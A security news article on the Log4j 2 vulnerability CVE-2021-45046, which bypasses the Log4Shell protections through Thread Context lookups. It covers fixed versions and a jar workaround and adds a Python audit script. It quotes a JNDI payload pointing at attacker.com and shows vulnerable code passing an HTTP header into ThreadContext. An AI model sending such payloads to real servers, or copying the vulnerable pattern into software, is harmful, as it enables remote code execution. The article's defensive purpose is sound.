A new attack on Log4j 2 that bypasses the added protection

Another vulnerability has been identified in the JNDI substitution handling of the Log4j 2 library (CVE-2021-45046). It is present despite the fix added in release 2.15 and regardless of whether the "log4j2.noFormatMsgLookup" setting is used for protection. The problem is dangerous mainly for older Log4j 2 versions that were protected with the "noFormatMsgLookup" flag, since it allows the protection against the previous vulnerability (Log4Shell, CVE-2021-44228) to be bypassed and code to be executed on the server. For users of version 2.15, exploitation is limited to crashing the application through exhaustion of available resources.

The vulnerability only manifests on systems that use Context Lookups such as ${ctx:loginId}, or Thread Context Map directives such as %X, %mdc and %MDC, in their logging. The attack comes down to getting data containing JNDI substitutions written to the log when the application uses context lookups or MDC templates in the rules that format log output.

Researchers from LunaSec noted that in Log4j versions below 2.15 this vulnerability can be used as a new attack vector for Log4Shell, leading to code execution, whenever ThreadContext expressions that receive external data are used when writing to the log, regardless of whether the "MsgFormatLookups" flag or the "%m{nolookups}" template was applied for protection.


The protection bypass rests on the fact that, instead of substituting "${jndi:ldap://attacker.com/a}" directly, the expression is substituted through the value of an intermediate variable used in the log output formatting rules. For example, if the context lookup ${ctx:apiversion} is used when writing to the log, the attack can be carried out by placing the string "${jndi:ldap://attacker.com/a}" into the value written to the apiversion variable. Example of vulnerable code:

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    @GetMapping("/")
    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        // The value of the "X-Api-Version" HTTP header is passed to ThreadContext
        ThreadContext.put("apiversion", apiVersion);
        // When writing to the log, the external apiversion value is processed via the ${ctx:apiversion} substitution
        logger.info("Received a request for API version");
        return "Hello, world!";
    }

In Log4j 2.15 the vulnerability can be used for DoS attacks by passing values into ThreadContext that cause the output formatting pattern to loop.


Updates 2.16 and 2.12.2 have been published to block the vulnerability. In the Log4j 2.16 branch, in addition to the fix applied in version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is completely disabled by default and support for message substitution patterns has been removed. As a security workaround, it is suggested to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
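As an added example that is not part of the original article, the following Python script audits a Log4j 2 properties file for the Thread Context directives named above (${ctx:...}, %X, %mdc, %MDC) inside PatternLayout patterns, and checks whether a jar still contains the JndiLookup class that the workaround removes. The configuration and jar contents are constructed inline for illustration.

```python
import io, re, zipfile
from typing import Dict, List

# PatternLayout directives that read the Thread Context Map (MDC). Values the
# application puts there are re-evaluated for ${...} lookups on log output.
CONTEXT_PATTERNS = [
    re.compile(r"\$\{ctx:[^}]*\}"),                    # ${ctx:apiversion}
    re.compile(r"%X(?:\{[^}]*\})?"),                   # %X or %X{key}
    re.compile(r"%mdc(?:\{[^}]*\})?", re.IGNORECASE),  # %mdc{key} / %MDC{key}
]
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Constructed sample config mirroring the vulnerable pattern from the article.
VULNERABLE_CONFIG = """\
appender.console.layout.type = PatternLayout
appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n
"""

def find_context_lookups(pattern: str) -> List[str]:
    """Return every MDC-reading directive in a layout pattern, in order."""
    hits = []
    for rx in CONTEXT_PATTERNS:
        hits.extend((m.start(), m.group(0)) for m in rx.finditer(pattern))
    return [text for _, text in sorted(hits)]

def audit_properties(text: str) -> Dict[str, List[str]]:
    """Map each '*.layout.pattern' key to the risky directives it contains."""
    findings = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().endswith("layout.pattern"):
            hits = find_context_lookups(value.strip())
            if hits:
                findings[key.strip()] = hits
    return findings

def jar_has_jndi_lookup(jar) -> bool:
    # jar may be a path or a file object; True if JndiLookup.class is still shipped
    with zipfile.ZipFile(jar) as zf:
        return JNDI_LOOKUP_CLASS in zf.namelist()

def build_sample_jar(include_jndi: bool) -> io.BytesIO:
    """Constructed stand-in for log4j-core-*.jar with empty class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    buf.seek(0)
    return buf
```

A pattern that triggers no findings and a jar without JndiLookup.class together correspond to the hardened state described above; a finding means external data reaching ThreadContext must be treated as untrusted input to the layout.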

You can track the availability of package fixes on the distribution pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and those of Java platform vendors (GitHub, Docker, Oracle, vmWare, Broadcom and Amazon / AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).

Source: opennet.ru
